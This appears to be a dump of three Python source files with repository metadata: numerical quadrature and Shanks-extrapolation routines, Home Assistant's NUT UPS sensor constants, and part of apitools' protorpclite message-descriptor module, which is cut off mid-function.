[ 0.3808729816246299567633625, 0.0289030896011252031348762],
[ 0.4095852916783015425288684, 0.0285168543223950979909368],
[ 0.4378974021720315131089780, 0.0281027556591011733176483],
[ 0.4657816497733580422492166, 0.0276611982207923882942042],
[ 0.4932107892081909335693088, 0.0271926134465768801364916],
[ 0.5201580198817630566468157, 0.0266974591835709626603847],
[ 0.5465970120650941674679943, 0.0261762192395456763423087],
[ 0.5725019326213811913168704, 0.0256294029102081160756420],
[ 0.5978474702471787212648065, 0.0250575444815795897037642],
[ 0.6226088602037077716041908, 0.0244612027079570527199750],
[ 0.6467619085141292798326303, 0.0238409602659682059625604],
[ 0.6702830156031410158025870, 0.0231974231852541216224889],
[ 0.6931491993558019659486479, 0.0225312202563362727017970],
[ 0.7153381175730564464599671, 0.0218430024162473863139537],
[ 0.7368280898020207055124277, 0.0211334421125276415426723],
[ 0.7575981185197071760356680, 0.0204032326462094327668389],
[ 0.7776279096494954756275514, 0.0196530874944353058653815],
[ 0.7968978923903144763895729, 0.0188837396133749045529412],
[ 0.8153892383391762543939888, 0.0180959407221281166643908],
[ 0.8330838798884008235429158, 0.0172904605683235824393442],
[ 0.8499645278795912842933626, 0.0164680861761452126431050],
[ 0.8660146884971646234107400, 0.0156296210775460027239369],
[ 0.8812186793850184155733168, 0.0147758845274413017688800],
[ 0.8955616449707269866985210, 0.0139077107037187726879541],
[ 0.9090295709825296904671263, 0.0130259478929715422855586],
[ 0.9216092981453339526669513, 0.0121314576629794974077448],
[ 0.9332885350430795459243337, 0.0112251140231859771172216],
[ 0.9440558701362559779627747, 0.0103078025748689695857821],
[ 0.9539007829254917428493369, 0.0093804196536944579514182],
[ 0.9628136542558155272936593, 0.0084438714696689714026208],
[ 0.9707857757637063319308979, 0.0074990732554647115788287],
[ 0.9778093584869182885537811, 0.0065469484508453227641521],
[ 0.9838775407060570154961002, 0.0055884280038655151572119],
[ 0.9889843952429917480044187, 0.0046244500634221193510958],
[ 0.9931249370374434596520099, 0.0036559612013263751823425],
[ 0.9962951347331251491861317, 0.0026839253715534824194396],
[ 0.9984919506395958184001634, 0.0017093926535181052395294],
[ 0.9997137267734412336782285, 0.0007346344905056717304063]],
dtype=float),
}
return weights[n][:,0], weights[n][:,1]
def shanks_table(seq, table=None, randomized=False):
r'''Copied from sympy.mpmath.mpmath.calculus.extrapolation.py
This shanks function is taken almost verbatim (minus an initial ctx
argument???) from sympy.mpmath.mpmath.calculus.extrapolation.py:
- http://docs.sympy.org/dev/modules/mpmath/calculus/sums_limits.html#mpmath.shanks
- https://github.com/sympy/sympy/blob/master/sympy/mpmath/calculus/extrapolation.py
mpmath is BSD license
Notes
-----
Given a list ``seq`` of the first `N` elements of a slowly
convergent infinite sequence `(A_k)`, :func:`~mpmath.shanks` computes the iterated
Shanks transformation `S(A), S(S(A)), \ldots, S^{N/2}(A)`. The Shanks
transformation often provides strong convergence acceleration,
especially if the sequence is oscillating.
The iterated Shanks transformation is computed using the Wynn
epsilon algorithm (see [1]). :func:`~mpmath.shanks` returns the full
epsilon table generated by Wynn's algorithm, which can be read
off as follows:
- The table is a list of lists forming a lower triangular matrix,
where higher row and column indices correspond to more accurate
values.
- The columns with even index hold dummy entries (required for the
computation) and the columns with odd index hold the actual
extrapolates.
- The last element in the last row is typically the most
accurate estimate of the limit.
- The difference to the third last element in the last row
provides an estimate of the approximation error.
- The magnitude of the second last element provides an estimate
of the numerical accuracy lost to cancellation.
For convenience, so the extrapolation is stopped at an odd index
so that ``shanks(seq)[-1][-1]`` always gives an estimate of the
limit.
Optionally, an existing table can be passed to :func:`~mpmath.shanks`.
This can be used to efficiently extend a previous computation after
new elements have been appended to the sequence. The table will
then be updated in-place.
The Shanks transformation:
The Shanks transformation is defined as follows (see [2]): given
the input sequence `(A_0, A_1, \ldots)`, the transformed sequence is
given by
.. math ::
S(A_k) = \frac{A_{k+1}A_{k-1}-A_k^2}{A_{k+1}+A_{k-1}-2 A_k}
The Shanks transformation gives the exact limit `A_{\infty}` in a
single step if `A_k = A + a q^k`. Note in particular that it
extrapolates the exact sum of a geometric series in a single step.
Applying the Shanks transformation once often improves convergence
substantially for an arbitrary sequence, but the optimal effect is
obtained by applying it iteratively:
`S(S(A_k)), S(S(S(A_k))), \ldots`.
Wynn's epsilon algorithm provides an efficient way to generate
the table of iterated Shanks transformations. It reduces the
computation of each element to essentially a single division, at
the cost of requiring dummy elements in the table. See [1] for
details.
Precision issues:
Due to cancellation effects, the sequence must be typically be
computed at a much higher precision than the target accuracy
of the extrapolation.
If the Shanks transformation converges to the exact limit (such
as if the sequence is a geometric series), then a division by
zero occurs. By default, :func:`~mpmath.shanks` handles this case by
terminating the iteration and returning the table it has
generated so far. With *randomized=True*, it will instead
replace the zero by a pseudorandom number close to zero.
(TODO: find a better solution to this problem.)
Examples (truncated from original)
We illustrate by applying Shanks transformation to the Leibniz
series for `\pi`:
>>> S = [4*sum((-1)**n/(2*n+1) for n in range(m))
... for m in range(1,30)]
>>>
>>> T = shanks_table(S[:7])
>>> for row in T:
... print('['+', '.join(['{:.6g}'.format(v) for v in row])+']')
...
[-0.75]
[1.25, 3.16667]
[-1.75, 3.13333, -28.75]
[2.25, 3.14524, 82.25, 3.14234]
[-2.75, 3.13968, -177.75, 3.14139, -969.938]
[3.25, 3.14271, 327.25, 3.14166, 3515.06, 3.14161]
'''
if len(seq) < 2:
raise ValueError("seq should be of minimum length 2")
if table:
START = len(table)
else:
START = 0
table = []
STOP = len(seq) - 1
if STOP & 1:
STOP -= 1
one = 1.0#ctx.one
eps = np.spacing(1)#+ctx.eps
if randomized:
from random import Random
rnd = Random()
rnd.seed(START)
for i in range(START, STOP):
row = []
for j in range(i+1):
if j == 0:
a, b = 0, seq[i+1]-seq[i]
else:
if j == 1:
a = seq[i]
else:
a = table[i-1][j-2]
b = row[j-1] - table[i-1][j-1]
if not b:
if randomized:
b = rnd.getrandbits(10)*eps
elif i & 1:
return table[:-1]
else:
return table
row.append(a + one/b)
table.append(row)
return table
def shanks(seq, ind=0):
"""Iterated Shanks transformation to accelerate series convergence
Though normally applied to a 1d array, `shanks` will actually operate on
the last dimension of seq which allows for multi-dimensional arrays. e.g.
for 2d data each row of sequence whould be a separate sequence
Parameters
----------
seq : list or array
If seq is a numpy array then it's elements will be modified in-place.
If seq is a list then seq will not be modified.
ind : int, optional
Start index for extrapolation. Can be negative, e.g. ind=-5
will extrapolate based on the last 5 elements of the `seq`.
default ind=0 i.e. use all elements.
Returns
-------
out : array with 1 dim less than `seq`, or float if seq is only 1d.
Extrapolated value. If `seq` is a numpy array then due to in-place
modification the result will also be in seq[..., -1].
See Also
--------
shanks_table : Copy of sympy.mpmath.calculus.extrapolation.shanks
Provides the whole epsilon table and error estimates.
numpy.apply_along_axis : If your sequence is not in the last dimension of
an array then use np.apply_along_axis to apply it along a specific
axis.
Notes
-----
I think this will also work on multi-dimensional data. The shanks
extrapolation will be performed on the last dimension of the data.
So for 2d data each row is a separate sequence.
For sequence:
.. math A=\\sum_{m=0}^{\\infty}a_m
The partial sum is first defined as:
.. math:: A_n=\\sum_{m=0}^{n}a_m
This forms a new sequence, the convergence of which can be sped up by
repeated use of:
.. math:: S(A_n)=\\frac{A_{n+1}A_{n-1}-A_n^2}{A_{n+1}-2A_n+A_{n-1}}
"""
seq = np.atleast_1d(seq)
if ind is None:
return +seq[..., -1]
if ind < 0:
ind = seq.shape[-1] + ind
ind = max(ind, 0)
for i in range(ind, seq.shape[-1] - 2, 2):
denom = (seq[..., i + 2:] - 2 * seq[..., i + 1: -1] + seq[..., i:-2])
if np.any(denom==0):
return +seq[..., -1]
seq[..., i + 2:] = (
(seq[..., i + 2:] * seq[..., i:-2] - seq[..., i + 1:-1]**2) /
denom)
return +seq[...,-1]
def gk_quad(f, a, b, args=(), n=10, sum_intervals=False):
"""Integration by Gauss-Kronrod quadrature between intervals
Parameters
----------
f : function or method
Function to integrate.
a, b : 1d array
Limits of integration. Must have len(a)==len(b).
args : tuple, optional
`args` will be passed to f using f(x, *args). Default args=().
n : [7,10,15,20,25,30], optional
Number of gauss quadrature evaluation points. Default n=10. There will
be 2*n+1 Kronrod quadrature points.
sum_intervals : [False, True]
If sum_intervals=True the integral for each a and b, will be summed.
Otherwise each interval integration will be returned. The sum of the
error estimates will also be summed.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
err_estimate : ndarray same size as igal
Estimate of the error in the integral. i.e. absolute value of fine
integral minus coarse integral.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj1, wj2 = gauss_kronrod_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj1 = wj1[np.newaxis, :]
wj2 = wj2[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
bpa = (ai + bi) /2 # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
#get shape of output with scalar argument and form a slice that will ensure
#any extra dims are appended to the args.
extra = np.array(f(xij.flat[0], *args))
gen_slice = [slice(None)] * xij.ndim + [None] * extra.ndim
fij = f(xij[gen_slice], *args)
# igral1 = np.ravel(bma) * np.sum(fij * wj1, axis=1)
# igral2 = np.ravel(bma) * np.sum(fij * wj2, axis=1)
# igral1 = bma[:, 0] * np.sum(fij * wj1, axis=1)
# igral2 = bma[:, 0] * np.sum(fij * wj2, axis=1)
igral1 = np.sum(bma[gen_slice] *fij * wj1[gen_slice], axis=1)
igral2 = np.sum(bma[gen_slice] *fij * wj2[gen_slice], axis=1)
err_estimate = np.abs(igral2 - igral1)
if sum_intervals:
igral1 = np.sum(igral1, axis=0)
igral2 = np.sum(igral2, axis=0)
err_estimate = np.sum(err_estimate, axis=0)
return igral2, err_estimate
def gl_quad(f, a, b, args=(), n=10, shanks_ind=False, sum_intervals=False):
"""Integration by Gauss-Legendre quadrature with subdivided interval
Parameters
----------
f : function or method
function to integrate. Must accept vector aguments for x. Might
need to use numpy.vecotrize.
a, b : 1d array
limits of integration
args : tuple, optional
args will be passed to f using f(x, *args). default=()
n : [2-20, 32, 64, 100], optional
number of quadrature evaluation points. default=10
sum_intervals : [False, True]
If sum_intervals=True the integral for each a and b, will be summed.
Otherwise each interval integration will be returned.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
Notes
-----
Be careful when using large values of n.There may be precision issues.
If f returns an ndarray when x is scalar. igral will have additonal
dimensions corresponding to those of the f-with-scalar-x output.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj = gauss_legendre_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj = wj[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
bpa = (ai + bi) /2 # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
#get shape of output with scalar argument and form a slice that will ensure
#any extra dims are appended to the args.
extra = np.array(f(xij.flat[0], *args))
gen_slice = [slice(None)] * xij.ndim + [None] * extra.ndim
fij = f(xij[gen_slice], *args)
igral = np.sum(bma[gen_slice] * fij *wj[gen_slice], axis=1)
if sum_intervals:
igral = np.sum(igral, axis=0)
return igral
| gpl-3.0 | 778,866,253,203,743,900 | 54.247768 | 131 | 0.664687 | false |
soldag/home-assistant | homeassistant/components/nut/const.py | 10 | 7810 | """The nut component."""
from homeassistant.components.sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_POWER,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.const import (
ELECTRICAL_CURRENT_AMPERE,
ELECTRICAL_VOLT_AMPERE,
FREQUENCY_HERTZ,
PERCENTAGE,
POWER_WATT,
TEMP_CELSIUS,
TIME_SECONDS,
VOLT,
)
DOMAIN = "nut"
PLATFORMS = ["sensor"]
UNDO_UPDATE_LISTENER = "undo_update_listener"
DEFAULT_NAME = "NUT UPS"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 3493
KEY_STATUS = "ups.status"
KEY_STATUS_DISPLAY = "ups.status.display"
COORDINATOR = "coordinator"
DEFAULT_SCAN_INTERVAL = 60
PYNUT_DATA = "data"
PYNUT_UNIQUE_ID = "unique_id"
PYNUT_MANUFACTURER = "manufacturer"
PYNUT_MODEL = "model"
PYNUT_FIRMWARE = "firmware"
PYNUT_NAME = "name"
SENSOR_TYPES = {
"ups.status.display": ["Status", "", "mdi:information-outline", None],
"ups.status": ["Status Data", "", "mdi:information-outline", None],
"ups.alarm": ["Alarms", "", "mdi:alarm", None],
"ups.temperature": [
"UPS Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"ups.load": ["Load", PERCENTAGE, "mdi:gauge", None],
"ups.load.high": ["Overload Setting", PERCENTAGE, "mdi:gauge", None],
"ups.id": ["System identifier", "", "mdi:information-outline", None],
"ups.delay.start": ["Load Restart Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.reboot": ["UPS Reboot Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.shutdown": [
"UPS Shutdown Delay",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.timer.start": ["Load Start Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.reboot": ["Load Reboot Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.shutdown": [
"Load Shutdown Timer",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.interval": [
"Self-Test Interval",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.result": ["Self-Test Result", "", "mdi:information-outline", None],
"ups.test.date": ["Self-Test Date", "", "mdi:calendar", None],
"ups.display.language": ["Language", "", "mdi:information-outline", None],
"ups.contacts": ["External Contacts", "", "mdi:information-outline", None],
"ups.efficiency": ["Efficiency", PERCENTAGE, "mdi:gauge", None],
"ups.power": ["Current Apparent Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.power.nominal": ["Nominal Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.realpower": [
"Current Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.realpower.nominal": [
"Nominal Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.beeper.status": ["Beeper Status", "", "mdi:information-outline", None],
"ups.type": ["UPS Type", "", "mdi:information-outline", None],
"ups.watchdog.status": ["Watchdog Status", "", "mdi:information-outline", None],
"ups.start.auto": ["Start on AC", "", "mdi:information-outline", None],
"ups.start.battery": ["Start on Battery", "", "mdi:information-outline", None],
"ups.start.reboot": ["Reboot on Battery", "", "mdi:information-outline", None],
"ups.shutdown": ["Shutdown Ability", "", "mdi:information-outline", None],
"battery.charge": [
"Battery Charge",
PERCENTAGE,
"mdi:gauge",
DEVICE_CLASS_BATTERY,
],
"battery.charge.low": ["Low Battery Setpoint", PERCENTAGE, "mdi:gauge", None],
"battery.charge.restart": [
"Minimum Battery to Start",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charge.warning": [
"Warning Battery Setpoint",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charger.status": ["Charging Status", "", "mdi:information-outline", None],
"battery.voltage": ["Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.nominal": ["Nominal Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.low": ["Low Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.high": ["High Battery Voltage", VOLT, "mdi:flash", None],
"battery.capacity": ["Battery Capacity", "Ah", "mdi:flash", None],
"battery.current": [
"Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.current.total": [
"Total Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.temperature": [
"Battery Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"battery.runtime": ["Battery Runtime", TIME_SECONDS, "mdi:timer-outline", None],
"battery.runtime.low": [
"Low Battery Runtime",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.runtime.restart": [
"Minimum Battery Runtime to Start",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.alarm.threshold": [
"Battery Alarm Threshold",
"",
"mdi:information-outline",
None,
],
"battery.date": ["Battery Date", "", "mdi:calendar", None],
"battery.mfr.date": ["Battery Manuf. Date", "", "mdi:calendar", None],
"battery.packs": ["Number of Batteries", "", "mdi:information-outline", None],
"battery.packs.bad": [
"Number of Bad Batteries",
"",
"mdi:information-outline",
None,
],
"battery.type": ["Battery Chemistry", "", "mdi:information-outline", None],
"input.sensitivity": [
"Input Power Sensitivity",
"",
"mdi:information-outline",
None,
],
"input.transfer.low": ["Low Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.high": ["High Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.reason": [
"Voltage Transfer Reason",
"",
"mdi:information-outline",
None,
],
"input.voltage": ["Input Voltage", VOLT, "mdi:flash", None],
"input.voltage.nominal": ["Nominal Input Voltage", VOLT, "mdi:flash", None],
"input.frequency": ["Input Line Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"input.frequency.nominal": [
"Nominal Input Line Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
"input.frequency.status": [
"Input Frequency Status",
"",
"mdi:information-outline",
None,
],
"output.current": ["Output Current", ELECTRICAL_CURRENT_AMPERE, "mdi:flash", None],
"output.current.nominal": [
"Nominal Output Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"output.voltage": ["Output Voltage", VOLT, "mdi:flash", None],
"output.voltage.nominal": ["Nominal Output Voltage", VOLT, "mdi:flash", None],
"output.frequency": ["Output Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"output.frequency.nominal": [
"Nominal Output Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
}
STATE_TYPES = {
"OL": "Online",
"OB": "On Battery",
"LB": "Low Battery",
"HB": "High Battery",
"RB": "Battery Needs Replaced",
"CHRG": "Battery Charging",
"DISCHRG": "Battery Discharging",
"BYPASS": "Bypass Active",
"CAL": "Runtime Calibration",
"OFF": "Offline",
"OVER": "Overloaded",
"TRIM": "Trimming Voltage",
"BOOST": "Boosting Voltage",
"FSD": "Forced Shutdown",
"ALARM": "Alarm",
}
SENSOR_NAME = 0
SENSOR_UNIT = 1
SENSOR_ICON = 2
SENSOR_DEVICE_CLASS = 3
| apache-2.0 | -6,297,612,210,622,498,000 | 31.272727 | 87 | 0.590141 | false |
Sorsly/subtle | google-cloud-sdk/lib/third_party/apitools/base/protorpclite/descriptor.py | 6 | 19700 | #!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Services descriptor definitions.
Contains message definitions and functions for converting
service classes into transmittable message format.
Describing an Enum instance, Enum class, Field class or Message class will
generate an appropriate descriptor object that describes that class.
This message can itself be used to transmit information to clients wishing
to know the description of an enum value, enum, field or message without
needing to download the source code. This format is also compatible with
other, non-Python languages.
The descriptors are modeled to be binary compatible with
https://github.com/google/protobuf
NOTE: The names of types and fields are not always the same between these
descriptors and the ones defined in descriptor.proto. This was done in order
to make source code files that use these descriptors easier to read. For
example, it is not necessary to prefix TYPE to all the values in
FieldDescriptor.Variant as is done in descriptor.proto
FieldDescriptorProto.Type.
Example:
class Pixel(messages.Message):
x = messages.IntegerField(1, required=True)
y = messages.IntegerField(2, required=True)
color = messages.BytesField(3)
# Describe Pixel class using message descriptor.
fields = []
field = FieldDescriptor()
field.name = 'x'
field.number = 1
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'y'
field.number = 2
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'color'
field.number = 3
field.label = FieldDescriptor.Label.OPTIONAL
field.variant = FieldDescriptor.Variant.BYTES
fields.append(field)
message = MessageDescriptor()
message.name = 'Pixel'
message.fields = fields
# Describing is the equivalent of building the above message.
message == describe_message(Pixel)
Public Classes:
EnumValueDescriptor: Describes Enum values.
EnumDescriptor: Describes Enum classes.
FieldDescriptor: Describes field instances.
FileDescriptor: Describes a single 'file' unit.
FileSet: Describes a collection of file descriptors.
MessageDescriptor: Describes Message classes.
Public Functions:
describe_enum_value: Describe an individual enum-value.
describe_enum: Describe an Enum class.
describe_field: Describe a Field definition.
describe_file: Describe a 'file' unit from a Python module or object.
describe_file_set: Describe a file set from a list of modules or objects.
describe_message: Describe a Message definition.
"""
import codecs
import types
import six
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import util
__all__ = [
'EnumDescriptor',
'EnumValueDescriptor',
'FieldDescriptor',
'MessageDescriptor',
'FileDescriptor',
'FileSet',
'DescriptorLibrary',
'describe_enum',
'describe_enum_value',
'describe_field',
'describe_message',
'describe_file',
'describe_file_set',
'describe',
'import_descriptor_loader',
]
# NOTE: MessageField is missing because message fields cannot have
# a default value at this time.
# TODO(user): Support default message values.
#
# Map to functions that convert default values of fields of a given type
# to a string. The function must return a value that is compatible with
# FieldDescriptor.default_value and therefore a unicode string.
_DEFAULT_TO_STRING_MAP = {
messages.IntegerField: six.text_type,
messages.FloatField: six.text_type,
messages.BooleanField: lambda value: value and u'true' or u'false',
messages.BytesField: lambda value: codecs.escape_encode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: lambda value: six.text_type(value.number),
}
_DEFAULT_FROM_STRING_MAP = {
messages.IntegerField: int,
messages.FloatField: float,
messages.BooleanField: lambda value: value == u'true',
messages.BytesField: lambda value: codecs.escape_decode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: int,
}
class EnumValueDescriptor(messages.Message):
"""Enum value descriptor.
Fields:
name: Name of enumeration value.
number: Number of enumeration value.
"""
# TODO(user): Why are these listed as optional in descriptor.proto.
# Harmonize?
name = messages.StringField(1, required=True)
number = messages.IntegerField(2,
required=True,
variant=messages.Variant.INT32)
class EnumDescriptor(messages.Message):
"""Enum class descriptor.
Fields:
name: Name of Enum without any qualification.
values: Values defined by Enum class.
"""
name = messages.StringField(1)
values = messages.MessageField(EnumValueDescriptor, 2, repeated=True)
class FieldDescriptor(messages.Message):
"""Field definition descriptor.
Enums:
Variant: Wire format hint sub-types for field.
Label: Values for optional, required and repeated fields.
Fields:
name: Name of field.
number: Number of field.
variant: Variant of field.
type_name: Type name for message and enum fields.
default_value: String representation of default value.
"""
Variant = messages.Variant # pylint:disable=invalid-name
class Label(messages.Enum):
"""Field label."""
OPTIONAL = 1
REQUIRED = 2
REPEATED = 3
name = messages.StringField(1, required=True)
number = messages.IntegerField(3,
required=True,
variant=messages.Variant.INT32)
label = messages.EnumField(Label, 4, default=Label.OPTIONAL)
variant = messages.EnumField(Variant, 5)
type_name = messages.StringField(6)
# For numeric types, contains the original text representation of
# the value.
# For booleans, "true" or "false".
# For strings, contains the default text contents (not escaped in any
# way).
# For bytes, contains the C escaped value. All bytes < 128 are that are
# traditionally considered unprintable are also escaped.
default_value = messages.StringField(7)
class MessageDescriptor(messages.Message):
"""Message definition descriptor.
Fields:
name: Name of Message without any qualification.
fields: Fields defined for message.
message_types: Nested Message classes defined on message.
enum_types: Nested Enum classes defined on message.
"""
name = messages.StringField(1)
fields = messages.MessageField(FieldDescriptor, 2, repeated=True)
message_types = messages.MessageField(
'apitools.base.protorpclite.descriptor.MessageDescriptor', 3,
repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 4, repeated=True)
class FileDescriptor(messages.Message):
"""Description of file containing protobuf definitions.
Fields:
package: Fully qualified name of package that definitions belong to.
message_types: Message definitions contained in file.
enum_types: Enum definitions contained in file.
"""
package = messages.StringField(2)
# TODO(user): Add dependency field
message_types = messages.MessageField(MessageDescriptor, 4, repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 5, repeated=True)
class FileSet(messages.Message):
"""A collection of FileDescriptors.
Fields:
files: Files in file-set.
"""
files = messages.MessageField(FileDescriptor, 1, repeated=True)
def describe_enum_value(enum_value):
"""Build descriptor for Enum instance.
Args:
enum_value: Enum value to provide descriptor for.
Returns:
Initialized EnumValueDescriptor instance describing the Enum instance.
"""
enum_value_descriptor = EnumValueDescriptor()
enum_value_descriptor.name = six.text_type(enum_value.name)
enum_value_descriptor.number = enum_value.number
return enum_value_descriptor
def describe_enum(enum_definition):
"""Build descriptor for Enum class.
Args:
enum_definition: Enum class to provide descriptor for.
Returns:
Initialized EnumDescriptor instance describing the Enum class.
"""
enum_descriptor = EnumDescriptor()
enum_descriptor.name = enum_definition.definition_name().split('.')[-1]
values = []
for number in enum_definition.numbers():
value = enum_definition.lookup_by_number(number)
values.append(describe_enum_value(value))
if values:
enum_descriptor.values = values
return enum_descriptor
def describe_field(field_definition):
"""Build descriptor for Field instance.
Args:
field_definition: Field instance to provide descriptor for.
Returns:
Initialized FieldDescriptor instance describing the Field instance.
"""
field_descriptor = FieldDescriptor()
field_descriptor.name = field_definition.name
field_descriptor.number = field_definition.number
field_descriptor.variant = field_definition.variant
if isinstance(field_definition, messages.EnumField):
field_descriptor.type_name = field_definition.type.definition_name()
if isinstance(field_definition, messages.MessageField):
field_descriptor.type_name = (
field_definition.message_type.definition_name())
if field_definition.default is not None:
field_descriptor.default_value = _DEFAULT_TO_STRING_MAP[
type(field_definition)](field_definition.default)
# Set label.
if field_definition.repeated:
field_descriptor.label = FieldDescriptor.Label.REPEATED
elif field_definition.required:
field_descriptor.label = FieldDescriptor.Label.REQUIRED
else:
field_descriptor.label = FieldDescriptor.Label.OPTIONAL
return field_descriptor
def describe_message(message_definition):
"""Build descriptor for Message class.
Args:
message_definition: Message class to provide descriptor for.
Returns:
Initialized MessageDescriptor instance describing the Message class.
"""
message_descriptor = MessageDescriptor()
message_descriptor.name = message_definition.definition_name().split(
'.')[-1]
fields = sorted(message_definition.all_fields(),
key=lambda v: v.number)
if fields:
message_descriptor.fields = [describe_field(field) for field in fields]
try:
nested_messages = message_definition.__messages__
except AttributeError:
pass
else:
message_descriptors = []
for name in nested_messages:
value = getattr(message_definition, name)
message_descriptors.append(describe_message(value))
message_descriptor.message_types = message_descriptors
try:
nested_enums = message_definition.__enums__
except AttributeError:
pass
else:
enum_descriptors = []
for name in nested_enums:
value = getattr(message_definition, name)
enum_descriptors.append(describe_enum(value))
message_descriptor.enum_types = enum_descriptors
return message_descriptor
def describe_file(module):
"""Build a file from a specified Python module.
Args:
module: Python module to describe.
Returns:
Initialized FileDescriptor instance describing the module.
"""
descriptor = FileDescriptor()
descriptor.package = util.get_package_for_module(module)
if not descriptor.package:
descriptor.package = None
message_descriptors = []
enum_descriptors = []
# Need to iterate over all top level attributes of the module looking for
# message and enum definitions. Each definition must be itself described.
for name in sorted(dir(module)):
value = getattr(module, name)
if isinstance(value, type):
if issubclass(value, messages.Message):
message_descriptors.append(describe_message(value))
elif issubclass(value, messages.Enum):
enum_descriptors.append(describe_enum(value))
if message_descriptors:
descriptor.message_types = message_descriptors
if enum_descriptors:
descriptor.enum_types = enum_descriptors
return descriptor
def describe_file_set(modules):
"""Build a file set from a specified Python modules.
Args:
modules: Iterable of Python module to describe.
Returns:
Initialized FileSet instance describing the modules.
"""
descriptor = FileSet()
file_descriptors = []
for module in modules:
file_descriptors.append(describe_file(module))
if file_descriptors:
descriptor.files = file_descriptors
return descriptor
def describe(value):
"""Describe any value as a descriptor.
Helper function for describing any object with an appropriate descriptor
object.
Args:
value: Value to describe as a descriptor.
Returns:
Descriptor message class if object is describable as a descriptor, else
None.
"""
if isinstance(value, types.ModuleType):
return describe_file(value)
elif isinstance(value, messages.Field):
return describe_field(value)
elif isinstance(value, messages.Enum):
return describe_enum_value(value)
elif isinstance(value, type):
if issubclass(value, messages.Message):
return describe_message(value)
elif issubclass(value, messages.Enum):
return describe_enum(value)
return None
@util.positional(1)
def import_descriptor_loader(definition_name, importer=__import__):
"""Find objects by importing modules as needed.
A definition loader is a function that resolves a definition name to a
descriptor.
The import finder resolves definitions to their names by importing modules
when necessary.
Args:
definition_name: Name of definition to find.
importer: Import function used for importing new modules.
Returns:
Appropriate descriptor for any describable type located by name.
Raises:
DefinitionNotFoundError when a name does not refer to either a definition
or a module.
"""
# Attempt to import descriptor as a module.
if definition_name.startswith('.'):
definition_name = definition_name[1:]
if not definition_name.startswith('.'):
leaf = definition_name.split('.')[-1]
if definition_name:
try:
module = importer(definition_name, '', '', [leaf])
except ImportError:
pass
else:
return describe(module)
try:
# Attempt to use messages.find_definition to find item.
return describe(messages.find_definition(definition_name,
importer=__import__))
except messages.DefinitionNotFoundError as err:
# There are things that find_definition will not find, but if
# the parent is loaded, its children can be searched for a
# match.
split_name = definition_name.rsplit('.', 1)
if len(split_name) > 1:
